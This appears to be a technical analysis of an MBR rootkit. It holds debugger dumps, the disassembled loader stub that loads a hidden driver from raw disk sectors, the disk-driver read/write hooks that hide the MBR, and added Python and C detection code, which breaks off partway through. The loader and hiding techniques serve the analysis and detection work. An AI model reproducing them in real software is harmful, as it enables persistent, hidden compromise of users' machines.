    eax=805715e7 ebx=81bf06e5 ecx=f9e637ec edx=00000000 esi=f9e63810 edi=f9e6380c
    
    kd> dt -r nt!_OBJECT_ATTRIBUTES f9e637ec
       +0x000 Length           : 0x18
       +0x004 RootDirectory    : (null) 
       +0x008 ObjectName       : 0xf9e63804  "\??\PhysicalDrive0"
          +0x000 Length           : 0x24
          +0x002 MaximumLength    : 0x26
          +0x004 Buffer           : 0x81bf074e  "\??\PhysicalDrive0"
       +0x00c Attributes       : 0x40
       +0x010 SecurityDescriptor : (null) 
       +0x014 SecurityQualityOfService : (null) 
    
    81bf0791 ffd0             call    eax {nt!NtOpenFile (805715e7)}
    81bf0793 55               push    ebp
    81bf0794 6862e00737       push    0x3707e062
    81bf0799 ffd3             call    ebx {81bf06e5}
    81bf079b 97               xchg    eax,edi
    81bf079c 55               push    ebp
    81bf079d 6816d5fc84       push    0x84fcd516
    81bf07a2 ffd3             call    ebx {81bf06e5}
    81bf07a4 8906             mov     [esi],eax
    81bf07a6 6800000000       push    0x0
    81bf07ab 680000b97f       push    0x7fb90000	; offset of the first sector = 2 142 830 592
    81bf07b0 8bcc             mov     ecx,esp
    81bf07b2 6a00             push    0x0
    81bf07b4 51               push    ecx
    81bf07b5 b900bc0300       mov     ecx,0x3bc00
    81bf07ba 51               push    ecx
    81bf07bb 51               push    ecx
    81bf07bc 6a00             push    0x0
    81bf07be ffd7             call    edi {nt!ExAllocatePool (8050fd66)}
    81bf07c0 50               push    eax
    81bf07c1 56               push    esi
    81bf07c2 8bce             mov     ecx,esi
    81bf07c4 96               xchg    eax,esi
    81bf07c5 33d2             xor     edx,edx
    81bf07c7 52               push    edx
    81bf07c8 52               push    edx
    81bf07c9 52               push    edx
    81bf07ca ff742458         push    dword ptr [esp+0x58]
    81bf07ce ff11             call dword ptr [ecx]{nt!NtReadFile (80571b30)} ds:0023:f9e63810=80571b30
    81bf07d0 55               push    ebp
    81bf07d1 685f4cd4dc       push    0xdcd44c5f
    81bf07d6 ffd3             call    ebx {81bf06e5}
    81bf07d8 ff742440         push    dword ptr [esp+0x40]
    81bf07dc ffd0             call    eax {nt!NtClose (805675d9)}
    81bf07de 8b463c           mov     eax,[esi+0x3c]
    81bf07e1 03c6             add     eax,esi
    81bf07e3 50               push    eax
    81bf07e4 8b5050           mov     edx,[eax+0x50]
    81bf07e7 52               push    edx
    81bf07e8 52               push    edx
    81bf07e9 6a00             push    0x0
    81bf07eb ffd7             call    edi {nt!ExAllocatePool (8050fd66)}
    81bf07ed 97               xchg    eax,edi
    81bf07ee 59               pop     ecx
    81bf07ef 57               push    edi
    81bf07f0 32c0             xor     al,al
    81bf07f2 f3aa             rep     stosb
    81bf07f4 5f               pop     edi
    81bf07f5 58               pop     eax
    81bf07f6 60               pushad
    81bf07f7 8b4854           mov     ecx,[eax+0x54]
    81bf07fa f3a4             rep     movsb
    81bf07fc 61               popad
    81bf07fd 2bc6             sub     eax,esi
    81bf07ff 03c7             add     eax,edi
    81bf0801 0fb74806         movzx   ecx,word ptr [eax+0x6]
    81bf0805 8d90f8000000     lea     edx,[eax+0xf8]
    81bf080b 60               pushad
    81bf080c 037214           add     esi,[edx+0x14]
    81bf080f 037a0c           add     edi,[edx+0xc]
    81bf0812 8b4a10           mov     ecx,[edx+0x10]
    81bf0815 e302             jecxz   81bf0819
    81bf0817 f3a4             rep     movsb
    81bf0819 61               popad
    81bf081a 83c228           add     edx,0x28
    81bf081d e2ec             loop    81bf080b
    81bf081f 50               push    eax
    81bf0820 60               pushad
    81bf0821 8bfe             mov     edi,esi
    81bf0823 91               xchg    eax,ecx
    81bf0824 b900ef0000       mov     ecx,0xef00
    81bf0829 f3ab             rep     stosd
    81bf082b 61               popad
    81bf082c 55               push    ebp
    81bf082d 681f9d489d       push    0x9d489d1f
    81bf0832 ffd3             call    ebx {81bf06e5}
    81bf0834 95               xchg    eax,ebp
    81bf0835 56               push    esi
    81bf0836 ffd5             call    ebp {nt!ExFreePool (8054b7aa)}
    81bf0838 8b742408         mov     esi,[esp+0x8]
    81bf083c ffb42484000000   push    dword ptr [esp+0x84]
    81bf0843 57               push    edi
    81bf0844 8b4628           mov     eax,[esi+0x28]
    81bf0847 03c7             add     eax,edi
    81bf0849 ffd0             call    eax {81951946}    <--- driver's entry point 
    81bf084b 0bc0             or      eax,eax
    81bf084d 7d0e             jge     81bf085d
    81bf084f 8b4e50           mov     ecx,[esi+0x50]
    81bf0852 e309             jecxz   81bf085d
    81bf0854 32c0             xor     al,al
    81bf0856 57               push    edi
    81bf0857 f3aa             rep     stosb
    81bf0859 5f               pop     edi
    81bf085a 57               push    edi
    81bf085b ffd5             call    ebp
    81bf085d 83c460           add     esp,0x60
    81bf0860 33c0             xor     eax,eax
    81bf0862 8bfb             mov     edi,ebx
    81bf0864 83ef15           sub     edi,0x15
    81bf0867 b99c010000       mov     ecx,0x19c
    81bf086c f3aa             rep     stosb                        
    81bf086e 61               popad
    81bf086f c20400           ret     0x4
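
To analyse the driver without running it, an analyst can carve it from a raw disk image at the offset the installer used and read the same PE fields the stub reads. The Python below is an added example, not the rootkit's or the page's code: it seeks to an offset, validates the MZ/PE headers, lists the sections using the offsets the disassembly dereferences (e_lfanew at 0x3c, NumberOfSections at +0x6, AddressOfEntryPoint at +0x28, SizeOfImage at +0x50, SizeOfHeaders at +0x54, section headers walked with a 0x28 stride) and maps the entry-point RVA to a file offset. The disk image and the tiny stand-in PE inside it are constructed and placed at 0x10000 rather than at the real offset, which is kept only as a constant.

```python
import io
import struct

# Where the installer log above places the driver on disk, and how much it writes
DRIVER_OFFSET = 2_142_830_592   # 0x7fb90000, the constant pushed at 81bf07ab
DRIVER_LENGTH = 244_736

# Constructed: the sample disk image below holds a tiny stand-in PE at this offset
SAMPLE_OFFSET = 0x10000
SAMPLE_LENGTH = 0x800


def parse_pe_layout(image):
    """Read the header fields the loader stub dereferences, at the same offsets it uses."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header at the carved offset")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]                    # mov eax,[esi+0x3c]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 0x06)[0]     # movzx ecx,word ptr [eax+0x6]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 0x14)[0]         # SizeOfOptionalHeader
    entry_rva = struct.unpack_from("<I", image, e_lfanew + 0x28)[0]        # mov eax,[esi+0x28]
    size_of_image = struct.unpack_from("<I", image, e_lfanew + 0x50)[0]    # mov edx,[eax+0x50]
    size_of_headers = struct.unpack_from("<I", image, e_lfanew + 0x54)[0]  # mov ecx,[eax+0x54]
    # The stub hard-codes lea edx,[eax+0xf8]; that is only right when SizeOfOptionalHeader is 0xE0
    sec_off = e_lfanew + 0x18 + opt_size
    sections = []
    for _ in range(num_sections):
        name = image[sec_off:sec_off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, sec_off + 0x08)
        sections.append({"name": name, "virtual_address": va, "virtual_size": vsize,
                         "raw_size": raw_size, "raw_pointer": raw_ptr})
        sec_off += 0x28                                                     # add edx,0x28
    return {"e_lfanew": e_lfanew, "num_sections": num_sections, "entry_rva": entry_rva,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers,
            "sections": sections, "loader_section_offset_ok": opt_size == 0xE0}


def rva_to_file_offset(layout, rva):
    """Translate an RVA (e.g. the entry point) into an offset inside the carved file."""
    if rva < layout["size_of_headers"]:
        return rva
    for s in layout["sections"]:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return rva - s["virtual_address"] + s["raw_pointer"]
    return None


def carve_and_parse(disk, offset, length):
    """Seek to the offset the installer used, read the image and parse it."""
    disk.seek(offset)
    image = disk.read(length)
    if len(image) < length:
        raise ValueError("disk image shorter than expected")
    layout = parse_pe_layout(image)
    layout["entry_file_offset"] = rva_to_file_offset(layout, layout["entry_rva"])
    return layout


def build_sample_driver_image():
    """Constructed minimal PE32 (not the real driver) with the fields the stub reads filled in."""
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1010)      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x10000)     # ImageBase
    struct.pack_into("<I", opt, 0x38, 0x3000)      # SizeOfImage
    struct.pack_into("<I", opt, 0x3C, 0x400)       # SizeOfHeaders
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    secs = [(b".text", 0x200, 0x1000, 0x200, 0x400, 0x60000020),
            (b".data", 0x100, 0x2000, 0x200, 0x600, 0xC0000040)]
    sec_hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                        for n, vs, va, rs, rp, ch in secs)
    headers = bytearray(0x400)
    headers[:2] = b"MZ"
    struct.pack_into("<I", headers, 0x3C, 0x80)    # e_lfanew
    nt = b"PE\0\0" + coff + bytes(opt) + sec_hdrs
    headers[0x80:0x80 + len(nt)] = nt
    return bytes(headers) + b"\xCC" * 0x200 + b"\x00" * 0x200


def build_sample_disk():
    """Constructed disk image: zeros with the stand-in PE placed at SAMPLE_OFFSET."""
    disk = bytearray(SAMPLE_OFFSET + SAMPLE_LENGTH)
    disk[SAMPLE_OFFSET:] = build_sample_driver_image()
    return io.BytesIO(bytes(disk))


if __name__ == "__main__":
    layout = carve_and_parse(build_sample_disk(), SAMPLE_OFFSET, SAMPLE_LENGTH)
    print(f"entry RVA 0x{layout['entry_rva']:x} -> file offset 0x{layout['entry_file_offset']:x}")
    for s in layout["sections"]:
        print(f"{s['name']:8s} VA 0x{s['virtual_address']:06x} raw 0x{s['raw_pointer']:x}+0x{s['raw_size']:x}")
```

Against a real image one would open the raw device or a forensic image and call carve_and_parse with DRIVER_OFFSET and DRIVER_LENGTH; note that the stub's fixed +0xf8 section-table offset and its raw-size-only copy (it ignores VirtualSize) are quirks of its loader, not of the PE format, which is why the parser reads SizeOfOptionalHeader instead of assuming it.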
    

    Sectors hider/protector


    To hide the real content of the MBR and other sectors from AV scanners, the rootkit hooks the IRP_MJ_READ handler of "\Driver\Disk". When an API reads sector 0 (MBR), the rootkit modifies the disk IRP_MJ_READ call and returns the copy of the original MBR stored in sector 62. The second hook (IRP_MJ_WRITE) protects the rootkit from being deleted or overwritten.

    ---- Devices - GMER 1.0.13 ----
    
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_READ   81831410
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_WRITE  81831410
    
    ---- Threads - GMER 1.0.13 ----
    
    Thread  4:2032                                           81837EE8
    Thread  4:2036                                           81830E44
    Thread  4:2040                                           81836496
    Thread  4:120                                            81867A90
    Thread  4:1716                                           818552E0
    Thread  4:124                                            8189B9D0
    Thread  4:160                                            81841540
    Thread  4:232                                            818362A0
    
    ---- EOF - GMER 1.0.13 ----
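
One consequence of this hook is that sector 0 read through the normal OS path no longer matches the same sector read any other way (offline from a boot CD, or from a disk image). The Python below is an added example, not part of GMER or of the analysis above: it parses an MBR (boot-code area, partition table at 0x1be, 55AA signature at 0x1fe), compares an API view with an offline view, and checks the specific symptom described above, namely the API returning the sector-62 copy. The two sector images are constructed with placeholder text in the code area; the assumption that the loader leaves the partition table untouched, so that only the code area differs, is mine.

```python
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 0x1BE   # 446 bytes of boot code, then four 16-byte entries
BOOT_SIGNATURE = b"\x55\xAA"     # at offset 0x1FE
ORIGINAL_MBR_COPY_SECTOR = 62    # where the dropper stores the original MBR (from the text above)


def parse_mbr(sector):
    """Split a 512-byte sector into its boot-code area and the used partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    if sector[0x1FE:0x200] != BOOT_SIGNATURE:
        raise ValueError("missing 55AA boot signature")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        # status, CHS start (3 bytes, skipped), type, CHS end (3 bytes, skipped), LBA start, count
        status, ptype, lba_start, count = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype == 0:
            continue  # empty entry
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": count})
    return {"code": sector[:PARTITION_TABLE_OFFSET], "partitions": partitions}


def compare_mbr_views(api_view, offline_view):
    """Compare sector 0 as the running OS returns it with the same sector read another way.
    A hidden loader shows up as different boot code under an identical partition table."""
    a, o = parse_mbr(api_view), parse_mbr(offline_view)
    return {"identical": api_view == offline_view,
            "code_differs": a["code"] != o["code"],
            "partition_tables_match": a["partitions"] == o["partitions"]}


def hidden_copy_indicator(api_sector0, offline_sector62):
    """True when what the OS returns for sector 0 is byte-for-byte the content of
    sector 62, which is exactly what the IRP_MJ_READ hook described above produces."""
    return api_sector0 == offline_sector62


def build_sector(code, partitions):
    """Assemble a constructed MBR image: code area, partition entries, boot signature."""
    if len(code) > PARTITION_TABLE_OFFSET:
        raise ValueError("code area is at most 446 bytes")
    sec = bytearray(SECTOR_SIZE)
    sec[:len(code)] = code
    for i, (bootable, ptype, lba_start, count) in enumerate(partitions):
        struct.pack_into("<B3xB3xII", sec, PARTITION_TABLE_OFFSET + 16 * i,
                         0x80 if bootable else 0x00, ptype, lba_start, count)
    sec[0x1FE:0x200] = BOOT_SIGNATURE
    return bytes(sec)


# Constructed sample data: placeholder strings stand in for real boot code
SAMPLE_PARTITIONS = [(True, 0x07, 63, 4184901)]   # one bootable NTFS partition starting at LBA 63
ORIGINAL_MBR = build_sector(b"[placeholder: original boot code]", SAMPLE_PARTITIONS)
LOADER_MBR = build_sector(b"[placeholder: rootkit loader code]", SAMPLE_PARTITIONS)


if __name__ == "__main__":
    # Clean machine: both views agree
    print("clean: ", compare_mbr_views(ORIGINAL_MBR, ORIGINAL_MBR))
    # Hooked machine: the API hands back the sector-62 copy, the offline read shows the loader
    print("hooked:", compare_mbr_views(api_view=ORIGINAL_MBR, offline_view=LOADER_MBR))
    print("sector 0 via API equals sector 62:", hidden_copy_indicator(ORIGINAL_MBR, ORIGINAL_MBR))
```

The comparison deliberately separates the code area from the partition table: a legitimate change of partition layout alters the table, while a bootkit has every reason to keep the table intact and change only the 446 bytes of code, so "code differs, table matches" is the signature to look for when the two views disagree.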
    
    kd> dt -r _DEVICE_OBJECT 81be1ab8
       +0x000 Type             : 3
       +0x002 Size             : 0x518
       +0x004 ReferenceCount   : 0
       +0x008 DriverObject     : 0x81b92510 
          +0x000 Type             : 4
          +0x002 Size             : 168
          +0x004 DeviceObject     : 0x81be0310 
             +0x000 Type             : 3
             +0x002 Size             : 0x368
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81b92510 
             +0x00c NextDevice       : 0x81be1ab8 
             +0x010 AttachedDevice   : (null) 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0xd0
             +0x020 Characteristics  : 0x100
             +0x024 Vpb              : 0x81be0288 
             +0x028 DeviceExtension  : 0x81be03c8 
             +0x02c DeviceType       : 7
             +0x030 StackSize        : 5 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0x200
             +0x0ae Spare1           : 0
             +0x0b0 DeviceObjectExtension : 0x81be0678 
             +0x0b4 Reserved         : (null) 
          +0x008 Flags            : 0x12
          +0x00c DriverStart      : 0xf9a7c000 
          +0x010 DriverSize       : 0x8e00
          +0x014 DriverSection    : 0x81bf1ca0 
          +0x018 DriverExtension  : 0x81b925b8 
             +0x000 DriverObject     : 0x81b92510 
             +0x004 AddDevice        : 0xf9a94ec0           CLASSPNP!ClassAddDevice+0
             +0x008 Count            : 1
             +0x00c ServiceKeyName   : _UNICODE_STRING "Disk"
             +0x014 ClientDriverExtension : 0x81b92388 
             +0x018 FsFilterCallbacks : (null) 
          +0x01c DriverName       : _UNICODE_STRING "\Driver\Disk"
             +0x000 Length           : 0x18
             +0x002 MaximumLength    : 0x18
             +0x004 Buffer           : 0xe1403358  "\Driver\Disk"
          +0x024 HardwareDatabase : 0x8068de90  "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
             +0x000 Length           : 0x5a
             +0x002 MaximumLength    : 0x5c
             +0x004 Buffer           : 0x805ceb98  "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
          +0x028 FastIoDispatch   : (null) 
          +0x02c DriverInit       : 0xf9a838ab        disk!GsDriverEntry+0
          +0x030 DriverStartIo    : (null) 
          +0x034 DriverUnload     : 0xf9a9353a        CLASSPNP!ClassUnload+0
          +0x038 MajorFunction    : [28] 0xf9a92c30        CLASSPNP!ClassCreateClose+0
       +0x00c NextDevice       : (null) 
       +0x010 AttachedDevice   : 0x81be0020 
          +0x000 Type             : 3
          +0x002 Size             : 0x1c8
          +0x004 ReferenceCount   : 0
          +0x008 DriverObject     : 0x81bd4748 
             +0x000 Type             : 4
             +0x002 Size             : 168
             +0x004 DeviceObject     : 0x81be0020 
             +0x008 Flags            : 0x12
             +0x00c DriverStart      : 0xf9cd4000 
             +0x010 DriverSize       : 0x4900
             +0x014 DriverSection    : 0x81bf1de0 
             +0x018 DriverExtension  : 0x81bd47f0 
             +0x01c DriverName       : _UNICODE_STRING "\Driver\PartMgr"
             +0x024 HardwareDatabase : 0x8068de90  "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
             +0x028 FastIoDispatch   : (null) 
             +0x02c DriverInit       : 0xf9cd7880           PartMgr!DriverEntry+0
             +0x030 DriverStartIo    : (null) 
             +0x034 DriverUnload     : 0xf9cd49a1           PartMgr!PmUnload+0
             +0x038 MajorFunction    : [28] 0xf9cd44af           PartMgr!PmPassThrough+0
          +0x00c NextDevice       : (null) 
          +0x010 AttachedDevice   : (null) 
          +0x014 CurrentIrp       : (null) 
          +0x018 Timer            : (null) 
          +0x01c Flags            : 0x10
          +0x020 Characteristics  : 0x100
          +0x024 Vpb              : 0x81bebca0 
             +0x000 Type             : 10
             +0x002 Size             : 88
             +0x004 Flags            : 0
             +0x006 VolumeLabelLength : 0
             +0x008 DeviceObject     : (null) 
             +0x00c RealDevice       : 0x81be0020 
             +0x010 SerialNumber     : 0
             +0x014 ReferenceCount   : 0
             +0x018 VolumeLabel      : [32] 0
          +0x028 DeviceExtension  : 0x81be00d8 
          +0x02c DeviceType       : 7
          +0x030 StackSize        : 4 ''
          +0x034 Queue            : __unnamed
             +0x000 ListEntry        : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x000 Wcb              : _WAIT_CONTEXT_BLOCK
          +0x05c AlignmentRequirement : 1
          +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x000 Type             : 20
             +0x002 Size             : 20
             +0x004 DeviceListHead   : _LIST_ENTRY [ 0x81be0084 - 0x81be0084 ]
             +0x00c Lock             : 0
             +0x010 Busy             : 0 ''
          +0x074 Dpc              : _KDPC
             +0x000 Type             : 0
             +0x002 Number           : 0 ''
             +0x003 Importance       : 0 ''
             +0x004 DpcListEntry     : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x00c DeferredRoutine  : (null) 
             +0x010 DeferredContext  : (null) 
             +0x014 SystemArgument1  : (null) 
             +0x018 SystemArgument2  : (null) 
             +0x01c Lock             : (null) 
          +0x094 ActiveThreadCount : 0
          +0x098 SecurityDescriptor : (null) 
          +0x09c DeviceLock       : _KEVENT
             +0x000 Header           : _DISPATCHER_HEADER
          +0x0ac SectorSize       : 0
          +0x0ae Spare1           : 0
          +0x0b0 DeviceObjectExtension : 0x81be01e8 
             +0x000 Type             : 13
             +0x002 Size             : 0
             +0x004 DeviceObject     : 0x81be0020 
             +0x008 PowerFlags       : 0
             +0x00c Dope             : 0x81b81d60 
             +0x010 ExtensionFlags   : 0
             +0x014 DeviceNode       : (null) 
             +0x018 AttachedTo       : 0x81be1ab8 
             +0x01c StartIoCount     : 0
             +0x020 StartIoKey       : 0
             +0x024 StartIoFlags     : 0
             +0x028 Vpb              : (null) 
          +0x0b4 Reserved         : (null) 
       +0x014 CurrentIrp       : (null) 
       +0x018 Timer            : (null) 
       +0x01c Flags            : 0x50
       +0x020 Characteristics  : 0x100
       +0x024 Vpb              : 0x81bebd00 
          +0x000 Type             : 10
          +0x002 Size             : 88
          +0x004 Flags            : 0x10
          +0x006 VolumeLabelLength : 0
          +0x008 DeviceObject     : (null) 
          +0x00c RealDevice       : 0x81be1ab8 
             +0x000 Type             : 3
             +0x002 Size             : 0x518
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81b92510 
             +0x00c NextDevice       : (null) 
             +0x010 AttachedDevice   : 0x81be0020 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0x50
             +0x020 Characteristics  : 0x100
             +0x024 Vpb              : 0x81bebd00 
             +0x028 DeviceExtension  : 0x81be1b70 
             +0x02c DeviceType       : 7
             +0x030 StackSize        : 3 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0
             +0x0ae Spare1           : 1
             +0x0b0 DeviceObjectExtension : 0x81be1fd0 
             +0x0b4 Reserved         : (null) 
          +0x010 SerialNumber     : 0xffffffff
          +0x014 ReferenceCount   : 0
          +0x018 VolumeLabel      : [32] 0
       +0x028 DeviceExtension  : 0x81be1b70 
       +0x02c DeviceType       : 7
       +0x030 StackSize        : 3 ''
       +0x034 Queue            : __unnamed
          +0x000 ListEntry        : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x000 Flink            : (null) 
             +0x004 Blink            : (null) 
          +0x000 Wcb              : _WAIT_CONTEXT_BLOCK
             +0x000 WaitQueueEntry   : _KDEVICE_QUEUE_ENTRY
             +0x010 DeviceRoutine    : (null) 
             +0x014 DeviceContext    : (null) 
             +0x018 NumberOfMapRegisters : 0
             +0x01c DeviceObject     : (null) 
             +0x020 CurrentIrp       : (null) 
             +0x024 BufferChainingDpc : (null) 
       +0x05c AlignmentRequirement : 1
       +0x060 DeviceQueue      : _KDEVICE_QUEUE
          +0x000 Type             : 20
          +0x002 Size             : 20
          +0x004 DeviceListHead   : _LIST_ENTRY [ 0x81be1b1c - 0x81be1b1c ]
             +0x000 Flink            : 0x81be1b1c  [ 0x81be1b1c - 0x81be1b1c ]
             +0x004 Blink            : 0x81be1b1c  [ 0x81be1b1c - 0x81be1b1c ]
          +0x00c Lock             : 0
          +0x010 Busy             : 0 ''
       +0x074 Dpc              : _KDPC
          +0x000 Type             : 0
          +0x002 Number           : 0 ''
          +0x003 Importance       : 0 ''
          +0x004 DpcListEntry     : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x000 Flink            : (null) 
             +0x004 Blink            : (null) 
          +0x00c DeferredRoutine  : (null) 
          +0x010 DeferredContext  : (null) 
          +0x014 SystemArgument1  : (null) 
          +0x018 SystemArgument2  : (null) 
          +0x01c Lock             : (null) 
       +0x094 ActiveThreadCount : 0
       +0x098 SecurityDescriptor : 0xe13c9d90 
       +0x09c DeviceLock       : _KEVENT
          +0x000 Header           : _DISPATCHER_HEADER
             +0x000 Type             : 0x1 ''
             +0x001 Absolute         : 0 ''
             +0x002 Size             : 0x4 ''
             +0x003 Inserted         : 0 ''
             +0x004 SignalState      : 1
             +0x008 WaitListHead     : _LIST_ENTRY [ 0x81be1b5c - 0x81be1b5c ]
       +0x0ac SectorSize       : 0
       +0x0ae Spare1           : 1
       +0x0b0 DeviceObjectExtension : 0x81be1fd0 
          +0x000 Type             : 13
          +0x002 Size             : 0
          +0x004 DeviceObject     : 0x81be1ab8 
             +0x000 Type             : 3
             +0x002 Size             : 0x518
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81b92510 
             +0x00c NextDevice       : (null) 
             +0x010 AttachedDevice   : 0x81be0020 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0x50
             +0x020 Characteristics  : 0x100
             +0x024 Vpb              : 0x81bebd00 
             +0x028 DeviceExtension  : 0x81be1b70 
             +0x02c DeviceType       : 7
             +0x030 StackSize        : 3 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0
             +0x0ae Spare1           : 1
             +0x0b0 DeviceObjectExtension : 0x81be1fd0 
             +0x0b4 Reserved         : (null) 
          +0x008 PowerFlags       : 0
          +0x00c Dope             : 0x81b81e68 
          +0x010 ExtensionFlags   : 0
          +0x014 DeviceNode       : (null) 
          +0x018 AttachedTo       : 0x81be2f18 
             +0x000 Type             : 3
             +0x002 Size             : 0xb8
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81bebbd0 
             +0x00c NextDevice       : 0x81b93030 
             +0x010 AttachedDevice   : 0x81be1ab8 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0x50
             +0x020 Characteristics  : 0x180
             +0x024 Vpb              : (null) 
             +0x028 DeviceExtension  : 0x81ba0e50 
             +0x02c DeviceType       : 0x32
             +0x030 StackSize        : 2 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0
             +0x0ae Spare1           : 1
             +0x0b0 DeviceObjectExtension : 0x81be2fd0 
             +0x0b4 Reserved         : (null) 
          +0x01c StartIoCount     : 0
          +0x020 StartIoKey       : 0
          +0x024 StartIoFlags     : 0
          +0x028 Vpb              : (null) 
       +0x0b4 Reserved         : (null) 
    
    DriverObject -> MajorFunction    
    
    81b92548 f9a92c30 CLASSPNP!ClassCreateClose
    81b9254c 805025e4 nt!IopInvalidDeviceRequest
    81b92550 f9a92c30 CLASSPNP!ClassCreateClose
    81b92554 81831410                             <--- IRP_MJ_READ hook 
    81b92558 81831410                             <--- IRP_MJ_WRITE hook
    81b9255c 805025e4 nt!IopInvalidDeviceRequest
    81b92560 805025e4 nt!IopInvalidDeviceRequest
    81b92564 805025e4 nt!IopInvalidDeviceRequest
    81b92568 805025e4 nt!IopInvalidDeviceRequest
    81b9256c f9a8d366 CLASSPNP!ClassShutdownFlush
    81b92570 805025e4 nt!IopInvalidDeviceRequest
    81b92574 805025e4 nt!IopInvalidDeviceRequest
    81b92578 805025e4 nt!IopInvalidDeviceRequest
    81b9257c 805025e4 nt!IopInvalidDeviceRequest
    81b92580 f9a8d44d CLASSPNP!ClassDeviceControlDispatch
    81b92584 f9a90fc3 CLASSPNP!ClassInternalIoControl
    81b92588 f9a8d366 CLASSPNP!ClassShutdownFlush
    81b9258c 805025e4 nt!IopInvalidDeviceRequest
    81b92590 805025e4 nt!IopInvalidDeviceRequest
    81b92594 805025e4 nt!IopInvalidDeviceRequest
    81b92598 805025e4 nt!IopInvalidDeviceRequest
    81b9259c 805025e4 nt!IopInvalidDeviceRequest
    81b925a0 f9a8eef3 CLASSPNP!ClassDispatchPower
    81b925a4 f9a93a24 CLASSPNP!ClassSystemControl
    81b925a8 805025e4 nt!IopInvalidDeviceRequest
    81b925ac 805025e4 nt!IopInvalidDeviceRequest
    81b925b0 805025e4 nt!IopInvalidDeviceRequest
    81b925b4 f9a92d15 CLASSPNP!ClassDispatchPnp
    81b925b8 81b92510 
    81b925bc f9a94ec0 CLASSPNP!ClassAddDevice
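    A check that turns the dump above into a detection, added here as an example (it is not code from the original post): walk DRIVER_OBJECT.MajorFunction and report every entry whose address lies outside every loaded kernel module. The table below is the \Driver\Disk dispatch table copied from the dump; disk.sys's range is its DriverStart/DriverSize pair (0xf9a7c000, 0x8e00), while the nt and CLASSPNP ranges are assumed for the example, because the dump does not show them. The two hooked entries, 0x81831410, fall in the same 0x81xxxxxx pool region as the driver and device objects rather than in any image, which is exactly what the range test catches.

```c
/* Added example: range-check a driver's IRP dispatch table against the
 * loaded-module list. Not code from the original post. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define IRP_MJ_READ   0x03
#define IRP_MJ_WRITE  0x04
#define IRP_MJ_COUNT  28        /* IRP_MJ_MAXIMUM_FUNCTION + 1 */

typedef struct { const char *name; uint32_t base; uint32_t size; } module_range;

/* Loaded-module list as a scanner would collect it from PsLoadedModuleList.
 * disk.sys is the DriverStart/DriverSize pair from the dump; the nt and
 * CLASSPNP ranges are ASSUMED for this example (the dump does not show them). */
static const module_range g_modules[] = {
    { "nt",       0x80400000u, 0x002f0000u },
    { "disk",     0xf9a7c000u, 0x00008e00u },
    { "CLASSPNP", 0xf9a8c000u, 0x0000d000u },
};
#define G_MODULES_COUNT (sizeof g_modules / sizeof g_modules[0])

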